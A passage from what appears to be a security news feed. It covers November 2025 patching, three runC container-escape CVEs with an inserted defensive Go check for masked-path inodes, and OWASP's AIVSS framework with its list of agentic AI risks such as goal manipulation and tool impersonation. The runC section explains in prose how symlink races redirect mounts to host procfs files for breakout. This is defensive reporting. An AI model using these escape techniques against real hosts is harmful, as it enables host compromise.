These include a redesigned Start menu that allows more app pinning, a customizable “All Apps” view, and visual changes to the Taskbar’s battery icon, which can now display color indicators and percentage values. The update also resolves several performance and stability issues, such as Task Manager continuing to run in the background after closure, and connectivity problems in certain gaming handheld devices. Storage reliability, HTTP request parsing, and voice access setup have also been improved. Additionally, this update coincides with the end of support for Windows 11 Home and Pro version 23H2, making a small but notable shift in Microsoft’s lifecycle policy. Users running older CPUs that lack support for the new instruction sets required by Windows 11 24H2 may need to consider hardware upgrades or extended support programs. The Importance of Prompt Patching November’s updates, though fewer in number, address several vulnerabilities with serious potential consequences if left unpatched. Administrators are urged to prioritize systems exposed to the internet or running affected components, especially those related to the Windows Kernel, Microsoft Office, and Visual Studio. With one confirmed exploited zero-day and multiple critical RCE vulnerabilities, Microsoft Patch Tuesday for November 2025 serves as a reminder that timely patch deployment remains one of the most effective defenses against cyber threats. Organizations should also monitor system logs and intrusion detection systems for signs of exploitation and ensure that legacy or unsupported devices receive compensating controls. The November Patch Tuesday highlights the nature of vulnerabilities that can harm even the most protected systems. With an actively exploited zero-day and several critical vulnerabilities addressed, timely patching remains essential for reducing cyber risk. To strengthen defenses beyond standard patch cycles, organizations can leverage Cyble’s Vulnerability Management platform. 
- Researchers Uncover Critical runC Bugs Allowing Full Container Escape by Ashish Khaitan on November 11, 2025 at 7:45 am
Security researchers have revealed three serious vulnerabilities in runC, the Open Container Initiative (OCI)-compliant runtime that powers platforms such as Docker and Kubernetes, which could allow attackers to break container isolation and gain control of the host system. The flaws, tracked as CVE-2025-31133, CVE-2025-52565, and CVE-2025-52881, stem from weaknesses in how runC manages temporary bind mounts, symbolic links (symlinks), and certain write operations. Together, they can be exploited to achieve complete container escapes and even host-level compromises.

According to the U.S. National Vulnerability Database (NVD) and the runC project’s own advisories, these vulnerabilities arise from logic and race-condition errors within runC’s path resolution and mount handling. The issue occurs when runC attempts to mask access to restricted files by bind-mounting safe inodes such as /dev/null or /dev/console. If an attacker introduces a symlink or triggers a race condition during container initialization, the runtime may accidentally mount an attacker-specified target path, granting write access to critical host system files. This misconfiguration can expose kernel interfaces such as /proc/sys/kernel/core_pattern or /proc/sysrq-trigger, which, if modified, can be used to crash the host or escape the container environment entirely.

Aleksa Sarai, a developer at SUSE and member of the OCI Technical Board, explained that runC’s method for masking files is vulnerable because of how it interacts with symbolic links during initialization. “If an attacker places a symlink at the right time, runC may inadvertently mount an attacker-defined target, creating dangerous write access to critical kernel interfaces in /proc,” Sarai warned. The advisories emphasize that all three vulnerabilities could permit full container breakouts by bypassing runC’s intended restrictions.
Details of all the Vulnerabilities: CVE-2025-31133, CVE-2025-52565 and CVE-2025-52881

CVE-2025-31133 involves how runC implements “masked paths.” When the runtime bind-mounts /dev/null over a file to block access, an attacker can replace /dev/null with a symlink to a sensitive host file. This can cause runC to mount that host path as read-write, enabling an attacker to alter kernel parameters or trigger system crashes through /proc/sysrq-trigger. This vulnerability impacts all known versions of runC before the latest patches.

CVE-2025-52565 is a similar issue that targets /dev/console mounts. When runC attempts to bind /dev/console to /dev/pts/$n, an attacker who replaces /dev/pts/$n with a symlink can cause the bind-mount to target a different file. This vulnerability affects all versions of runC from 1.0.0-rc3 onward. Like CVE-2025-31133, it can be exploited to create read-write binds to critical procfs files, resulting in container breakout. The flaw has a CVSS score of 7.3.

While addressing CVE-2025-52565, developers also identified potential risks in how runC used file creation functions. Though these were not directly exploitable, fixes were included as a precaution. Additional mitigations were also applied to reduce race conditions in /dev/pts/$n, even though they are largely hypothetical in most deployments.

CVE-2025-52881 represents a more advanced attack vector that builds on previous runC vulnerabilities. It allows an attacker to redirect write operations within procfs, bypassing Linux Security Module (LSM) protections such as AppArmor and SELinux. This could enable malicious writes to files like /proc/sysrq-trigger, causing host crashes, or to /proc/sys/kernel/core_pattern, facilitating a container escape. This vulnerability affects all known versions of runC and has a CVSS score of 7.3. Researchers note that CVE-2025-52881 can pair with the other two flaws to simplify exploitation, acting as an LSM bypass that allows arbitrary writes to host files.
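The masked-path weakness described for CVE-2025-31133 comes down to trusting a path to be /dev/null without confirming what inode it names. The following Go sketch is an added example, not runC's code and not from the article: the helper name `openVerifiedNull` is hypothetical, and it assumes a Linux host. Note that O_NOFOLLOW only guards the final path component, so intermediate components still need secure path resolution of the kind the article attributes to filepath-securejoin.

```go
package main

import (
	"fmt"
	"os"
	"syscall"
)

// openVerifiedNull (hypothetical helper, Linux only) opens path without
// following a symlink in its last component, then checks on the open
// descriptor, not on the path, that the inode is the null character
// device (major 1, minor 3). The caller mounts from the verified fd.
func openVerifiedNull(path string) (*os.File, error) {
	fd, err := syscall.Open(path, syscall.O_RDONLY|syscall.O_NOFOLLOW|syscall.O_CLOEXEC, 0)
	if err != nil { // a symlink in the final component fails with ELOOP
		return nil, fmt.Errorf("open %s: %w", path, err)
	}
	f := os.NewFile(uintptr(fd), path)
	var st syscall.Stat_t
	if err := syscall.Fstat(fd, &st); err != nil {
		f.Close()
		return nil, fmt.Errorf("fstat %s: %w", path, err)
	}
	dev := uint64(st.Rdev) // Linux dev_t encoding, decoded below
	major := (dev>>8)&0xfff | (dev>>32)&^uint64(0xfff)
	minor := dev&0xff | (dev>>12)&^uint64(0xff)
	if st.Mode&syscall.S_IFMT != syscall.S_IFCHR || major != 1 || minor != 3 {
		f.Close()
		return nil, fmt.Errorf("%s: not the null device (mode %#o, dev %d:%d)", path, st.Mode, major, minor)
	}
	return f, nil
}

func main() {
	f, err := openVerifiedNull("/dev/null")
	if err != nil {
		fmt.Println("refusing to use as mask source:", err)
		return
	}
	defer f.Close()
	// A runtime would bind-mount from this descriptor (for example through
	// /proc/self/fd/<n>) instead of resolving the path a second time.
	fmt.Printf("verified mask source: /proc/self/fd/%d\n", f.Fd())
}
```

Verifying the descriptor rather than the path means a later swap of the path cannot change what was checked.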
Fixes, Versions, and Mitigation

The vulnerabilities have been addressed in runC v1.2.8, v1.3.3, and v1.4.0-rc.3. The patches introduce extensive code changes not only to runC itself but also to the supporting library filepath-securejoin, which handles secure path resolution. Maintainers strongly advise vendors and users to upgrade directly to these versions rather than applying individual patches, as the fixes are interdependent and cover overlapping issues across the three CVEs.

Recommended mitigations include:

  - By preventing the host root user from being mapped inside the container, unauthorized writes to procfs files are blocked by standard Unix permissions.
  - Containers should be configured with restricted privileges, and setuid binaries should be disabled using the noNewPrivileges flag.
  - SELinux may help limit exposure in certain cases, but CVE-2025-52881 can bypass LSM protections, making AppArmor or SELinux alone insufficient.

While these mitigations reduce exposure, immediate upgrades remain the most effective defense. The advisories caution that CVE-2025-52881 can undermine even strong LSM-based defenses if the runtime is not patched.

Conclusion

The recent runC vulnerabilities and coordinated fixes across runtimes demonstrate the critical need for proactive, intelligence-driven cybersecurity. Organizations using Docker, Kubernetes, or other OCI-based platforms should promptly upgrade to the patched versions (v1.2.8, v1.3.3, or v1.4.0-rc.3) and carefully review container privileges to reduce risk. The research contributions from Lei Wang, Li Fubang, Tõnis Tiigi, and Aleksa Sarai highlight the importance of cross-runtime collaboration to prevent container escapes.
- New AI Vulnerability Scoring System Announced to Address Gaps in CVSS by Ashish Khaitan on November 10, 2025 at 5:51 am
A new vulnerability scoring system has just been announced. The initiative, called the AI Vulnerability Scoring System (AIVSS), aims to fill the gaps left by traditional models such as the Common Vulnerability Scoring System (CVSS), which were not designed to handle the complex, non-deterministic nature of modern AI technologies.

AI security expert, author, and adjunct professor Ken Huang introduced the AIVSS framework, emphasizing that while CVSS has long been a cornerstone for assessing software vulnerabilities, it fails to capture the unique threat landscape presented by agentic and autonomous AI systems. “The CVSS and other regular software vulnerability frameworks are not enough,” Huang explained. “These assume traditional deterministic coding. We need to deal with the non-deterministic nature of Agentic AI.”

Huang serves as co-leader of the AIVSS project working group alongside several prominent figures in cybersecurity and academia, including Zenity Co-Founder and CTO Michael Bargury, Amazon Web Services Application Security Engineer Vineeth Sai Narajala, and Stanford University Information Security Officer Bhavya Gupta. Together, the group has collaborated under the Open Worldwide Application Security Project (OWASP) to develop a framework that provides a structured and measurable approach to assessing AI-related security threats.

According to Huang, Agentic AI introduces unique challenges because of its partial autonomy. “Autonomy is not itself a vulnerability, but it does elevate risk,” he noted. The AIVSS is designed specifically to quantify those additional risk factors that emerge when AI systems make independent decisions, interact dynamically with tools, or adapt their behavior in ways that traditional software cannot.

A New Approach to AI Vulnerability Scoring

The AI Vulnerability Scoring System builds upon the CVSS model, introducing new parameters tailored to the dynamic nature of AI systems. The AIVSS score begins with a base CVSS score and then incorporates an agentic capabilities assessment. This additional layer accounts for autonomy, non-determinism, and tool use, factors that can amplify risk in AI-driven systems. The combined score is then divided by two and multiplied by an environmental context factor to produce a final vulnerability score.

A dedicated portal, available at aivss.owasp.org, provides documentation, structured guides for AI risk assessment, and a scoring tool for practitioners to calculate their own AI vulnerability scores.

Huang highlighted a critical difference between AI systems and traditional software: the fluidity of AI identities. “We cannot assume the identities used at deployment time,” he said. “With agentic AI, you need the identity to be ephemeral and dynamically assigned. If you really want to have autonomy, you have to give it the privileges it needs to finish the task.”

Top Risks in Agentic AI Systems

The AIVSS project has also identified the ten most severe core security risks for Agentic AI, though the team has refrained from calling it an official “Top 10” list. The current risks include:

  - Agentic AI Tool Misuse
  - Agent Access Control Violation
  - Agent Cascading Failures
  - Agent Orchestration and Multi-Agent Exploitation
  - Agent Identity Impersonation
  - Agent Memory and Context Manipulation
  - Insecure Agent Critical Systems Interaction
  - Agent Supply Chain and Dependency Attacks
  - Agent Untraceability
  - Agent Goal and Instruction Manipulation

Each of these risks reflects the interconnected and compositional nature of AI systems. As the draft AIVSS document notes, “Some repetition across entries is intentional. Agentic systems are compositional and interconnected by design. To date, the most common risks such as Tool Misuse, Goal Manipulation, or Access Control Violations, often overlap or reinforce each other in cascading ways.”

Huang provided an example of how this manifests in practice: “For tool misuse, there shouldn’t be a risk in selecting a tool. But in MCP systems, there is tool impersonation, and also insecure tool usage.”














